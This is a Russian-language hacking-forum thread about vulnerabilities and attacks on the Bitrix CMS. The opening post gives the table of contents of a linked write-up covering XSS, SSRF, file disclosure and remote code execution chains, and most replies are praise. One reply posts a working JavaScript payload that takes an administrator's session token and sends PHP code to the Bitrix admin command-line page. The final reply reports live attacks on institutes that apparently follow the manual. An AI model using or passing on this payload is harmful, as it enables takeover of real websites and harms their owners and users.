Уязвимости и атаки на CMS Bitrix

Discussion in 'Статьи' started by crlf, 23 May 2022.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Code: 
    • Отказ от ответственности
• Предисловие
• Введение
1.    Особенности
    1.1.    Разнообразие версий
    1.2.    Встроенный WAF
    1.3.    CSRF токены
    1.4.    Множественные эндпоинты для авторизации
        1.4.1.    Standalone скрипты
        1.4.2.    404 Not Found
    1.5.    Многосайтовость
    1.6.    Многороутерность
    1.7.    Remeberme куки
    1.8.    Register Globals
    1.9.    Лицензионные ключи
    1.10.    Ключ подписи данных
    1.11.    Интересные системные директории
    1.12.    RCE by design
2.    Уязвимости
    2.1.    Full Path Disclosure
    2.2.    Content Spoofing ( mobileapp.list )
    2.3.    Content Spoofing ( pg.php )
    2.4.    Content Spoofing ( rest.marketplace.detail )
    2.5.    Account Enumeration ( UIDH )
    2.6.    Open Redirect ( LocalRedirect )
    2.7.    Reflected XSS ( map.google.view )
    2.8.    Reflected XSS ( photogallery_user )
    2.9.    Server-Side Request Forgery ( main.urlpreview )
    2.10.    Server-Side Request Forgery ( html_editor_action.php )
    2.11.    Local File Disclosure / Include ( virtual_file_system.php )
    2.12.    Arbitrary Object Instantiation ( vote/uf.php )
    2.13.    Arbitrary File Write ( html_editor_action.php )
3.    Методы атак
    3.1.    RCE via PHP Object Injection ( html_editor_action.php )
        3.1.1.    Gadget chain
        3.1.2.    Обход "фикса"
    3.2.    RCE via SQL Injection ( UIDH )
    3.3.    RCE via PHP Object Injection ( signer_default_key )
    3.4.    RCE via PHP Object Injection ( site_checker.php )
• Послесловие
• Ссылки
    https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf
     
    #1 crlf, 23 May 2022
    Last edited: 13 Jul 2022
    CyberTro1n, alexzir, 4eknasto and 10 others like this.
    1. Bo0oM

      Bo0oM Member

      Joined:
      26 Dec 2009
      Messages:
      2
      Likes Received:
      35
      Reputations:
      21
      Лучший
       
      #2 Bo0oM, 23 May 2022
      crlf likes this.
      1. dooble

        dooble Members of Antichat

        Joined:
        30 Dec 2016
        Messages:
        230
        Likes Received:
        596
        Reputations:
        145
        Удивил, в очередной раз.
        Даже не ресерчами, к ним уже привыкли, а что хватило терпения оформить это по красоте.
        Большой труд, отличная работа.

        Но боюсь представить какого цвета у тебя глаза, после всего этого.
        Наверное даже не красные, а темно лиловые.

        А может просто уставшие, но довольные.
         
        #3 dooble, 23 May 2022
        eminlayer7788, l1ght, crlf and 1 other person like this.
        1. 3nvY

          3nvY Elder - Старейшина

          Joined:
          8 Jun 2015
          Messages:
          51
          Likes Received:
          21
          Reputations:
          11
          Благодарю за качественный, а главное полезный материал.
          Воистину титанический труд.
           
          #4 3nvY, 24 May 2022
          crlf likes this.
          1. eminlayer7788

            eminlayer7788 Member

            Joined:
            31 Jul 2015
            Messages:
            181
            Likes Received:
            55
            Reputations:
            2
            Thanks !
             
            #5 eminlayer7788, 25 May 2022
            1. winstrool

              winstrool ~~*MasterBlind*~~

              Joined:
              6 Mar 2007
              Messages:
              1,411
              Likes Received:
              902
              Reputations:
              863
              Полезная нагрузка, для выполнения произвольного PHP кода, через XSS, при атаке на администратора CMS Bitrix.
              HTML: 
              <script>
  xhr = new XMLHttpRequest();
  xhr.withCredentials = true;
  xhr.open('GET', '/bitrix/tools/composite_data.php', false);
  xhr.onreadystatechange = function() {
    if(xhr.readyState == XMLHttpRequest.DONE){
    match = xhr.responseText.match(/'bitrix_sessid':'(.+?)'/);
    sessId = match[1];
    }
  };
  xhr.send();
 
  xhr.open('POST', '/bitrix/admin/php_command_line.php?lang=ru&sessid='+sessId, false);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send("query=phpinfo()%3B&result_as_text=y&ajax=y");
</script>
               
              _________________________
              #6 winstrool, 25 Apr 2023
              Last edited: 25 Apr 2023
              Spinus, eminlayer7788 and alexzir like this.
              1. Spinus

                Spinus Level 8

                Joined:
                23 Sep 2018
                Messages:
                483
                Likes Received:
                2,830
                Reputations:
                12
                На этой неделе пошли атаки на институты. Горячая пора - приемная комиссия, а тут такая жопа. Админы воют. Видимо мануал зашел в тему.
                 
                #7 Spinus, 28 Jun 2023
                (You must log in or sign up to post here.)